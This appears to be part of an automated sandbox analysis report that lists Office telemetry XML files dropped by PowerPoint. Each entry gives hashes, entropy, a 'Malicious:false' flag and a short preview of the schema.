                                                                                                                              SHA-512:DAFD338476E2977F8D861056DA580B51B8B333629B642561C81E6E999CDFA9FEBF58F34C50963EBC0F6622045D765FD1CAEAA07DC1A5F6ACCF8FFD6CBD654F4A
                                                                                                                              Malicious:false
                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<R Id="68025" V="1" DC="SM" EN="Office.TellMe.TellMeD.HelpServiceResponse" ATT="31d9dd3e4c7046a696537586281d7ed1-06d11dd6-a946-4281-8ac3-a7c2ab4776f5-7063" DL="N" DCa="PSU" xmlns="">.. <RIS>.. <RI N="ExperimentationCustomData" />.. </RIS>.. <S>.. <UTS T="1" Id="cnq3r" A="ck23e ck23f" />.. </S>.. <C T="FT" I="0" O="false" N="Timestamp">.. <S T="1" F="TimeStamp100ns" />.. </C>.. <C T="G" I="1" O="true" N="TellMeSessionId">.. <S T="1" F="sessionId" M="Ignore" />.. </C>.. <C T="TAG" I="2" O="true" N="Tag">.. <S T="1" F="ULS_Tag" M="Ignore" />.. </C>.. <C T="U32" I="3" O="true" N="ResponseTime">.. <S T="1" F="responseTime" M="Ignore" />.. </C>.. <C T="U32" I="4" O="false" N="UserActionID">.. <V V="0" T="U32" />.. </C>.. <C T="W" I="5" O="false" N="UserActionName">.. <V V="TellMeD_HelpServiceResponse" T="W" />.. </C>.. <T>.. <S T="1" />.. </T>..</R>..
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):1703
                                                                                                                              Entropy (8bit):4.965661719309549
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:24:2d1/norRPpOcPeFygxIl87Otass+4snTzNS8w:c1/oDOcG00IlTaYTz08w
                                                                                                                              MD5:98F5AF01EE7DA85EAC283B5DA5374C54
                                                                                                                              SHA1:9BCCC4929958D0AA9CB8A3D95C59C71230AF6E45
                                                                                                                              SHA-256:7B60E4DBDDEA4A27AC1A660BEA056238DCF59F2F4DC169597FF49BAC7197FA49
                                                                                                                              SHA-512:CE1FF6270B8F5C5F1E32B04AC9248FCC550051DBC70BF32FFE9B0D9C01EC486CA9F26D4B73579EDBB1D61D54B0EB382423487EE92219A27E73AB40649585C2B9
                                                                                                                              Malicious:false
                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<R Id="68026" V="0" DC="SM" EN="Office.TellMe.TellMeD.AppSessionContext" ATT="31d9dd3e4c7046a696537586281d7ed1-06d11dd6-a946-4281-8ac3-a7c2ab4776f5-7063" DL="N" DCa="PSU" xmlns="">.. <RIS>.. <RI N="ExperimentationCustomData" />.. </RIS>.. <S>.. <UTS T="1" Id="c4258" />.. </S>.. <C T="FT" I="0" O="false" N="Timestamp">.. <S T="1" F="TimeStamp100ns" />.. </C>.. <C T="B" I="1" O="true" N="SearchInTitleBar">.. <S T="1" F="SearchInTitleBar" M="Ignore" />.. </C>.. <C T="B" I="2" O="true" N="TellMeLicense">.. <S T="1" F="TellMeLicense" M="Ignore" />.. </C>.. <C T="B" I="3" O="true" N="ControllerSvc">.. <S T="1" F="ControllerSvc" M="Ignore" />.. </C>.. <C T="B" I="4" O="true" N="DownloadedContentControllerSvc">.. <S T="1" F="DownloadedContentControllerSvc" M="Ignore" />.. </C>.. <C T="B" I="5" O="true" N="PrivacyAccepted">.. <S T="1" F="PrivacyAccepted" M="Ignore" />.. </C>.. <C T="B" I="6" O="true" N="UseOnlineCo
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):846
                                                                                                                              Entropy (8bit):5.068085244975721
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:12:TMHdfKFaE3mderBjNlVA69JXBQ9UQ9nIdVYXOI0Xk4xP/AQ2LENO2su:2dCgnorjPjgkGXAXRJN7
                                                                                                                              MD5:F08944F903AC0842D511DF475E9FD7E9
                                                                                                                              SHA1:3F421FB1460FD332C33EA508AE21AADBF38FE9A2
                                                                                                                              SHA-256:708C7D8CF7C13D154865845D0DA09FB4C2566151D8A540164B646F783D4496FD
                                                                                                                              SHA-512:2E30533D3835FD3932EFDDF1647583D611520A9AACCEB25319E8B16F5FC60F7AC43F7E96C7686C41F1E8808F255F52B0E4ED0FB5380D1F18E23599796879E157
                                                                                                                              Malicious:false
                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<R Id="68027" V="0" DC="SM" EN="Office.TellMe.TellMeD.RankResultGroups" ATT="31d9dd3e4c7046a696537586281d7ed1-06d11dd6-a946-4281-8ac3-a7c2ab4776f5-7063" DL="N" DCa="PSU" xmlns="">.. <RIS>.. <RI N="ExperimentationCustomData" />.. </RIS>.. <S>.. <UTS T="1" Id="c3a4s" />.. </S>.. <C T="FT" I="0" O="false" N="Timestamp">.. <S T="1" F="TimeStamp100ns" />.. </C>.. <C T="G" I="1" O="true" N="TellMeSessionId">.. <S T="1" F="SessionId" M="Ignore" />.. </C>.. <C T="G" I="2" O="true" N="QueryId">.. <S T="1" F="QueryId" M="Ignore" />.. </C>.. <C T="W" I="3" O="true" N="IndexOrder">.. <S T="1" F="IndexOrder" M="Ignore" />.. </C>.. <C T="U64" I="4" O="true" N="TimeTaken">.. <S T="1" F="GetSuggestionsSync_TimeTaken" M="Ignore" />.. </C>.. <T>.. <S T="1" />.. </T>..</R>..
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):565
                                                                                                                              Entropy (8bit):5.219838188914371
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:12:TMHdb6zLXsVaE3mderSlVA6n+NHARdNO2su:2dbw8wnorSPP
                                                                                                                              MD5:050E9A8E480AAC7F9CB4B4F8BB6ED93A
                                                                                                                              SHA1:1C4BB0EEF0EFDA705FDA3EC087979D5D07426923
                                                                                                                              SHA-256:FEB439D8001AE67913D67D15BD681400609B07A0CC4C92EF6E5CCAB604A0825F
                                                                                                                              SHA-512:8E75D512962A042219E568A1D923131253C9A501700B05F446B699DEF7B2E285EFCF8D6BE6843E23E5B6DE6D4E9345B08FAEEF7EEC4AC42C4E3D0E7E16839E55
                                                                                                                              Malicious:false
                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<R Id="68028" V="0" DC="SM" EN="Office.TellMe.TellMeD.AlwaysCollapsedSearchBox" ATT="31d9dd3e4c7046a696537586281d7ed1-06d11dd6-a946-4281-8ac3-a7c2ab4776f5-7063" DL="N" DCa="PSU" xmlns="">.. <RIS>.. <RI N="ExperimentationCustomData" />.. </RIS>.. <S>.. <UTS T="1" Id="c4259" />.. </S>.. <C T="FT" I="0" O="false" N="Timestamp">.. <S T="1" F="TimeStamp100ns" />.. </C>.. <C T="B" I="1" O="true" N="AlwaysCollapsed">.. <S T="1" F="AlwaysCollapsed" M="Ignore" />.. </C>.. <T>.. <S T="1" />.. </T>..</R>..
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):1890
                                                                                                                              Entropy (8bit):4.972530512945299
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:24:2dzp6srnorIJPjYtY1rDT4EsN+WsawSplzAfrkfLIkoI/NXr9ZYgaCgQ:czAsrouYaEEsLsUygZ08F
                                                                                                                              MD5:2FB2A29E38481CE3366DFB856CCD3DB0
                                                                                                                              SHA1:B28BD2E7469E52A8CFA2EA8FEB335662084F71C6
                                                                                                                              SHA-256:4F0DAC9EA50D775FFAABD95880330E4759F2E00FB14D95881D81DF5B3D4DC272
                                                                                                                              SHA-512:184673463AAE195AB4BBDB9403E39F617C01A15A0D381768C804242A7DC7A88B5C3FF09F667CDD5F5ABFFA6EA7810FFC6EF3599FA1D7C0E3D41004FCA61D9A9D
                                                                                                                              Malicious:false
                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<R Id="68029" V="2" DC="SM" EN="Office.TellMe.TellMeD.SubstateServiceResponseSampled" ATT="31d9dd3e4c7046a696537586281d7ed1-06d11dd6-a946-4281-8ac3-a7c2ab4776f5-7063" DL="N" DCa="PSU" xmlns="">.. <RIS>.. <RI N="ExperimentationCustomData" />.. </RIS>.. <S>.. <UTS T="1" Id="8nqjj" A="bu1in bu1io bwm1q bu1ib" />.. </S>.. <C T="FT" I="0" O="false" N="Timestamp">.. <S T="1" F="TimeStamp100ns" />.. </C>.. <C T="G" I="1" O="true" N="TellMeSessionId">.. <S T="1" F="sessionId" M="Ignore" />.. </C>.. <C T="TAG" I="2" O="true" N="Tag">.. <S T="1" F="ULS_Tag" M="Ignore" />.. </C>.. <C T="U32" I="3" O="true" N="Result">.. <S T="1" F="result" M="Ignore" />.. </C>.. <C T="U32" I="4" O="true" N="HttpStatusCode">.. <S T="1" F="httpStatusCode" M="Ignore" />.. </C>.. <C T="U32" I="5" O="true" N="ResponseTime">.. <S T="1" F="responseTime" M="Ignore" />.. </C>.. <C T="U32" I="6" O="false" N="UserActionID">.. <V V="0" T="U32
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):1226
                                                                                                                              Entropy (8bit):4.975784164850255
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:12:TMHdJWP7aEPAQXerzJX8X/Q9Pp95i2YL2i2q4U/vvd+xU3Nea9uz9EjlPn6d+sbl:2dQW9rtHDM2Do/t+ubkaY+UEBn5D5e
                                                                                                                              MD5:F7C0FE7474AD5C1C9AF02FE1A2138BBC
                                                                                                                              SHA1:A2981626BF9F913AFD37118B44A02479726DD46B
                                                                                                                              SHA-256:99DB370C8A9AA6F683E757D06C37899907A7221837B1C4956A6743CB83EF926A
                                                                                                                              SHA-512:C0552A0EA9E3F0F8AF82908E9FDC23516D8A41462D2334F8153018D352450E2E0872417C790802BDB29A76A82B2D9A99D96E378450E2300FF10A95481ACDC573
                                                                                                                              Malicious:false
                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<R Id="68030" V="6" DC="SM" EN="Office.TellMe.TellMeD.QueryIndexLogging" ATT="31d9dd3e4c7046a696537586281d7ed1-06d11dd6-a946-4281-8ac3-a7c2ab4776f5-7063" SP="CriticalBusinessImpact" DL="N" DCa="PSU" xmlns="">.. <S>.. <UTS T="1" Id="dasij" />.. </S>.. <C T="G" I="0" O="true" N="TellMeSessionId">.. <S T="1" F="TellMeSessionId" M="Ignore" />.. </C>.. <C T="U32" I="1" O="false" N="QueryIndex">.. <S T="1" F="QueryIndex" M="Ignore" />.. </C>.. <C T="U32" I="2" O="true" N="HttpStatusCode">.. <S T="1" F="HttpStatusCode" M="Ignore" />.. </C>.. <C T="U32" I="3" O="true" N="StatusFlags">.. <S T="1" F="Result" M="Ignore" />.. </C>.. <C T="W" I="4" O="true" N="StatusMessage">.. <S T="1" F="StatusMessage" M="Ignore" />.. </C>.. <C T="U32" I="5" O="true" N="ResponseTime">.. <S T="1" F="ResponseTime" M="Ignore" />.. </C>.. <C T="FT" I="6" O="true" N="Timestamp">.. <S T="1" F="TimeStamp100ns" />.. </C>.. <C T="W" I="7" O="
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):872
                                                                                                                              Entropy (8bit):5.038541124472883
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:12:TMHdM31A9aEPAQXerkMXdcnU+dywlfMxdV23N1x3rQ/vArydf+mNO2su:2dgz9rkMXG1lkrI1xWEiG2
                                                                                                                              MD5:250686055FA24C43B562CD1629CCD010
                                                                                                                              SHA1:80A4EC505B7FEE38561C5A5BFF9D627BF55537EC
                                                                                                                              SHA-256:2636919185384218AE954398979DB6D326AFDC619D35840CE21BE67245783D78
                                                                                                                              SHA-512:40904F8408F2E4F138F5414505348CAD87F35B909733DFB8BD1F119AE82CD56929A7C00669BA3A848BE8FB436FBC0C61C5A743317E5B81844D0C6393C9091EFA
                                                                                                                              Malicious:false
                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<R Id="68031" V="0" DC="SM" EN="Office.TellMe.TellMeD.SessionEndStateLogging" ATT="31d9dd3e4c7046a696537586281d7ed1-06d11dd6-a946-4281-8ac3-a7c2ab4776f5-7063" SP="CriticalBusinessImpact" DL="N" DCa="PSU" xmlns="">.. <S>.. <UTS T="1" Id="ddth1" A="ddth2 ddth3" />.. </S>.. <C T="G" I="0" O="false" N="TellMeSessionId">.. <S T="1" F="SessionId" />.. </C>.. <C T="TAG" I="1" O="true" N="Tag">.. <S T="1" F="ULS_Tag" M="Ignore" />.. </C>.. <C T="W" I="2" O="false" N="Type">.. <S T="1" F="Type" />.. </C>.. <C T="W" I="3" O="true" N="Context">.. <S T="1" F="Context" M="Ignore" />.. </C>.. <C T="U32" I="4" O="true" N="GroupIndex">.. <S T="1" F="GroupIndex" M="Ignore" />.. </C>.. <C T="W" I="5" O="false" N="NamespaceLog">.. <S T="1" F="NamespaceLog" />.. </C>.. <T>.. <S T="1" />.. </T>..</R>..
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):404
                                                                                                                              Entropy (8bit):5.193617198634289
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:6:TMVBdPk6+XnaTq3HwBUuNtEz3CHperhNlNkGVlrt3+u6B+Y9NOn2sby:TMHd32LaEUerHRJ3SNO2su
                                                                                                                              MD5:B4DDB3737EAD248A39734DA4B1EF2093
                                                                                                                              SHA1:CE7297B24B07AEB596A56D2A52F658624B661580
                                                                                                                              SHA-256:FD6072BCC510EEFA0D0E48AEEB0EB4464F4DEC705B88875852D410267C651D0B
                                                                                                                              SHA-512:53A9076E90697E5357404CE3FDC449C7C168A2D4681DAA5818A6E7F2DFD925490929936385703831BF0F32234DE99F8344267A40307A54D0761C29A4E10325CD
                                                                                                                              Malicious:false
                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<R Id="68038" V="0" DC="SM" EN="Office.TellMe.TellMeD.VoiceSearchMic" ATT="31d9dd3e4c7046a696537586281d7ed1-06d11dd6-a946-4281-8ac3-a7c2ab4776f5-7063" DL="N" DCa="PSU" xmlns="">.. <S>.. <UTS T="1" Id="c8mqn" />.. </S>.. <C T="G" I="0" O="true" N="TellMeSpeechId">.. <S T="1" F="tellMeSpeechId" M="Ignore" />.. </C>.. <T>.. <S T="1" />.. </T>..</R>..
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):710
                                                                                                                              Entropy (8bit):5.081308824120238
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:12:TMHdIMtaEUerQQzUKJkTfxdL83Q9J3SsMZ/GNO2su:2dcArQ5KJq3L
                                                                                                                              MD5:7D7E7BCA2F5D14177D30E5F0520119C2
                                                                                                                              SHA1:3D0C1093707A9D60BB8AA049802323B493FC2AB9
                                                                                                                              SHA-256:DBBCFAAE99123CB781D2916FCF7BD63DA1F06E669004FAD6D3CE152162BD0487
                                                                                                                              SHA-512:51CA7B84945A5ECFC77E22F29F60BE1E5C60F36689630521A3944B3726EF0FCE37D332177A434AD806147ED72E7C9E6FFF6CE427333BF1103EC58F20769888E9
                                                                                                                              Malicious:false
                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<R Id="68039" V="1" DC="SM" EN="Office.TellMe.TellMeD.VoiceSearchStart" ATT="31d9dd3e4c7046a696537586281d7ed1-06d11dd6-a946-4281-8ac3-a7c2ab4776f5-7063" DL="N" DCa="PSU" xmlns="">.. <S>.. <UTS T="1" Id="c8mqo" />.. </S>.. <C T="I32" I="0" O="true" N="StartSpeechRecognitionStatus">.. <S T="1" F="recognitionStatus" M="Ignore" />.. </C>.. <C T="W" I="1" O="true" N="ConnectionID">.. <S T="1" F="connectionID" M="Ignore" />.. </C>.. <C T="G" I="2" O="true" N="TellMeSpeechId">.. <S T="1" F="tellMeSpeechId" M="Ignore" />.. </C>.. <C T="I32" I="3" O="true" N="HRESULT">.. <S T="1" F="hr" M="Ignore" />.. </C>.. <T>.. <S T="1" />.. </T>..</R>..
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):528
                                                                                                                              Entropy (8bit):5.192045537661589
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:6:TMVBdpmk6+X64TTq3HwBUuNtEz3CHperh6klrzVlrYwla6N2y+F/E2yns9nnqsVK:TMHdI4yaEUerEQzUKJkTfx9J3SNO2su
                                                                                                                              MD5:231928A6FD76A2569BCFB175CDB8163D
                                                                                                                              SHA1:E5B476AAE2D723034DD08E5A6D043E25FFA449AC
                                                                                                                              SHA-256:F07FF5E1ACE1DB8C8E769369E9C0918F2BF3BC626CB023CBCDF8AA49BC689381
                                                                                                                              SHA-512:48EF8AA779817B57C809723BEA482CA136CC83560B9118CA944866EAF4405F04C2C30770CD525165FA82073DEA1AC04DE926E20288E34CB05A1436BE91B91870
                                                                                                                              Malicious:false
                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<R Id="68040" V="0" DC="SM" EN="Office.TellMe.TellMeD.VoiceSearchStatus" ATT="31d9dd3e4c7046a696537586281d7ed1-06d11dd6-a946-4281-8ac3-a7c2ab4776f5-7063" DL="N" DCa="PSU" xmlns="">.. <S>.. <UTS T="1" Id="c8mqk" />.. </S>.. <C T="I32" I="0" O="true" N="StartSpeechRecognitionStatus">.. <S T="1" F="recognitionStatus" M="Ignore" />.. </C>.. <C T="G" I="1" O="true" N="TellMeSpeechId">.. <S T="1" F="tellMeSpeechId" M="Ignore" />.. </C>.. <T>.. <S T="1" />.. </T>..</R>..
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):1042
                                                                                                                              Entropy (8bit):4.883093524019439
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:12:TMHdN9WNWd4wdX5XQGl4AQXerieryyDKW8/K1lVzH4dLjAuaM9bb8OKX/c//fpOy:2dNdXxzrVruGP4evA
                                                                                                                              MD5:99454A8D978DB93B4776CCAFCA7DE6F9
                                                                                                                              SHA1:5803D066A94A6E2B864FF7B06CC4986965040EDD
                                                                                                                              SHA-256:FB5D5DCE3E0D16DFF52BE8B845A35E6AFE2E8AD6CD805F62314AEB7D95F057C8
                                                                                                                              SHA-512:6D79E52629BB0954F5EA777E3F2C34BB11C9D44AFAC9DB62975B2D473D0BABB943C9E0FBF5E318285D025C3FA06B06B6A54714B749F663062F8366EB7370A433
                                                                                                                              Malicious:false
                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<R Id="69600" V="1" DC="SM" EN="Office.Insights.InsightsDesktop.RenderingTime" ATT="250a372c4a854d8fb120ef0366f9410c-dd39bcd8-3b38-4c6c-9f8d-3821e5c28b47-7487" SP="CriticalBusinessImpact" DL="N" DCa="PSU" xmlns="">.. <S>.. <UTS T="1" Id="a5736" />.. <UTS T="2" Id="a5737" />.. <TR T="3" />.. </S>.. <G>.. <S T="1">.. <F N="AppCorrelationId" />.. </S>.. <S T="2">.. <F N="AppCorrelationId" />.. </S>.. </G>.. <C T="FT" I="0" O="true" N="TimeStamp">.. <S T="3" F="TimeStamp100ns" />.. </C>.. <C T="W" I="1" O="true" N="AppCorrelationId">.. <S T="1" F="AppCorrelationId" />.. </C>.. <C T="U64" I="2" O="true" N="EndToEndTime">.. <U T="100nsToMs">.. <O T="SUB">.. <L>.. <S T="2" F="TimeStamp100ns" />.. </L>.. <R>.. <S T="1" F="TimeStamp100ns" />.. </R>.. </O>.. </U>.. </C>.. <C T="B" I="3" O="true" N="IsFirstRun">.. <S T="1" F="IsFirstRun" />.. </
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):1703
                                                                                                                              Entropy (8bit):4.6287467149993144
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:24:2d9M4DUubtFboHnS3BNjXMi+EsdnKE+2h6wl/FfQaH:cucUubtuHqNjXMzbdKshBdIaH
                                                                                                                              MD5:BD8241191BD70B100FD8F32F05454AB9
                                                                                                                              SHA1:5656167580E395566F62832BEDE6BF5CE9B17E91
                                                                                                                              SHA-256:ABE15D727441AF494B5D2EC7C8E285DE4DBAEDA34E21B9336EFE8B457F7F0834
                                                                                                                              SHA-512:2EBA17CE6196706DA41C946233751245786CC6F89830636894B3F03C2C920FF23270E23BE72DC97CB868A251042DEA7D4A1C5A0DA07A082B5B84BEA62CF4B2C1
                                                                                                                              Malicious:false
                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<R Id="700000" V="2" DC="SM" EN="Office.Telemetry.Event.Office.FileIO" DL="A" xmlns="">.. <RIS>.. <RI N="Event" />.. </RIS>.. <S>.. <UCSS T="1" C="NexusTenantTokenFileIO" S="Medium" />.. <F T="2">.. <O T="AND">.. <L>.. <O T="LT">.. <L>.. <S T="1" F="EventSamplingPolicy" />.. </L>.. <R>.. <V V="191" T="U8" />.. </R>.. </O>.. </L>.. <R>.. <O T="NE">.. <L>.. <S T="1" F="EventName" />.. </L>.. <R>.. <V V="Office.FileIO.MSO.DocumentRecoveryHrGetDrpCore" T="W" />.. </R>.. </O>.. </R>.. </O>.. </F>.. </S>.. <C T="W" I="0" O="false" N="EventName">.. <S T="2" F="EventName" />.. </C>.. <C T="W" I="1" O="true" N="EventContract">.. <S T="2" F="EventContract" M="Ignore" />.. </C>.. <C T="U64" I="2" O="false" N="EventFlags"
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):1740
                                                                                                                              Entropy (8bit):4.664826904180416
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:24:2d9uO8DUu3tFboHnS3BNjXMi+EsdnKE+2h6wl/FfQaH:chwUu3tuHqNjXMzbdKshBdIaH
                                                                                                                              MD5:AD971DDB97C20119CC46535BA11237F6
                                                                                                                              SHA1:1FDD480F6A6D66D1F3EDB0721A73BE0E62291F21
                                                                                                                              SHA-256:1F5232CD1F289056D333C067D1C3D2EF3C9B5A4A306A23D0F41E1756B9B5CACA
                                                                                                                              SHA-512:5A7B595BB18211D662505DE5E2E79E4C96903E733FBA964D188657A2A0A5744377A7C6AC6DE86B49C705DB651B9E73A403876A09D4CE927A985D36E4A6751A76
                                                                                                                              Malicious:false
                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<R Id="700001" V="2" DC="SM" EN="Office.Telemetry.Event.Office.FileIO.Critical" SP="CriticalBusinessImpact" DL="A" xmlns="">.. <RIS>.. <RI N="Event" />.. </RIS>.. <S>.. <UCSS T="1" C="NexusTenantTokenFileIO" S="Medium" />.. <F T="2">.. <O T="AND">.. <L>.. <O T="GE">.. <L>.. <S T="1" F="EventSamplingPolicy" />.. </L>.. <R>.. <V V="191" T="U8" />.. </R>.. </O>.. </L>.. <R>.. <O T="NE">.. <L>.. <S T="1" F="EventName" />.. </L>.. <R>.. <V V="Office.FileIO.MSO.DocumentRecoveryHrGetDrpCore" T="W" />.. </R>.. </O>.. </R>.. </O>.. </F>.. </S>.. <C T="W" I="0" O="false" N="EventName">.. <S T="2" F="EventName" />.. </C>.. <C T="W" I="1" O="true" N="EventContract">.. <S T="2" F="EventContract" M="Ignore" />.. </C>.. <C T
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):544
                                                                                                                              Entropy (8bit):5.168891686759475
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:12:TMHd9pvhC4FDR6AfVX4zIVlVlr/662N9pzKe/eWhz:2d9ppC0DR68X4zUPln+Fbhz
                                                                                                                              MD5:F8E354D551F33B05CB9260346570495E
                                                                                                                              SHA1:33414AEE39D668F0F2787670174783186153B87E
                                                                                                                              SHA-256:AD50D1E8D459188AB6C3441926B4A408BDB4C37A8FD9E1AFDEC0C708E4B6C8E4
                                                                                                                              SHA-512:704AF045E7BDBCF37AB7951ADAB60436B3E7ADA971299EA7D6C05122AAF0901EFC54B744200BDE0D19590E77E82CB5E9C5F8F8217E420D74F0B6ED3DA8F47768
                                                                                                                              Malicious:false
                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<R Id="70002" V="3" DC="SM" EN="Office.AirSpace.DxError" ATT="da06315a64204a91b8c35628ae841a61-c2fdf120-6e99-4fdd-900e-ec9868e5e64b-7449" S="10" DCa="DC" xmlns="">.. <S>.. <Etw T="1" E="16" G="{f562bb8e-422d-4b5c-b20e-90d710f7d11c}" />.. </S>.. <C T="FT" I="0" O="false" N="Column_0">.. <S T="1" F="TimeStamp100ns" />.. </C>.. <C T="U32" I="1" O="false" N="Column_1">.. <S T="1" F="command" />.. </C>.. <C T="U32" I="2" O="false" N="Column_2">.. <S T="1" F="hresult" />.. </C>..</R>..
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):392
                                                                                                                              Entropy (8bit):5.290151700409384
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:6:TMVBd9k74kFaSJB8TtiaADIW7J6nAfB6X4zIi8jxPVCIeIse/Ly5sby:TMHd9qS6C4FDR6AfB6X4zIVlVlr/mz
                                                                                                                              MD5:EA42ED621D7DD597AAF3057D36F88714
                                                                                                                              SHA1:4FECC6ECC2CD24729194CB7F569AE4FFFCEF6342
                                                                                                                              SHA-256:6BAA699B0FDEAF476CFCCD162E0B1097633362394A183BE54F76BF9738BFA262
                                                                                                                              SHA-512:654A010F16B52228E98B104462A5A020101841BA92DA7FF743F4108DEC527856A3BA257B666129FC00C99230F780C530DEED636B303D878991628C44628B832F
                                                                                                                              Malicious:false
                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<R Id="70003" V="3" DC="SM" EN="Office.AirSpace.StdExceptionError" ATT="da06315a64204a91b8c35628ae841a61-c2fdf120-6e99-4fdd-900e-ec9868e5e64b-7449" S="10" DCa="DC" xmlns="">.. <S>.. <Etw T="1" E="22" G="{f562bb8e-422d-4b5c-b20e-90d710f7d11c}" />.. </S>.. <C T="FT" I="0" O="false" N="Column_0">.. <S T="1" F="TimeStamp100ns" />.. </C>..</R>..
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):1351
                                                                                                                              Entropy (8bit):4.856062142751853
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:24:2d9Y/DvBuMt1k3BNjXMi+EsdnKE+2h6wl/FfxvDb0w9:c2bvBuMteNjXMzbdKshBdpr
                                                                                                                              MD5:2C86F67D6CDEDBD44D7F1BFA09BFBA10
                                                                                                                              SHA1:FAF1DD9CD8956D2A1A9F1E4BDA552E4CE31F6F32
                                                                                                                              SHA-256:BC706561A5CBA17A0214F1507C9C8A2BC05F5ED8F3BE2D42157942D61D212670
                                                                                                                              SHA-512:8DFAA32B9398F6771329F5EF087882923AB0D8BACCC117779CBFBA4A199D1685AF885A53E508CB8B599FFB75BDDFDC48266478FAD7B70C523EFA06924E502905
                                                                                                                              Malicious:false
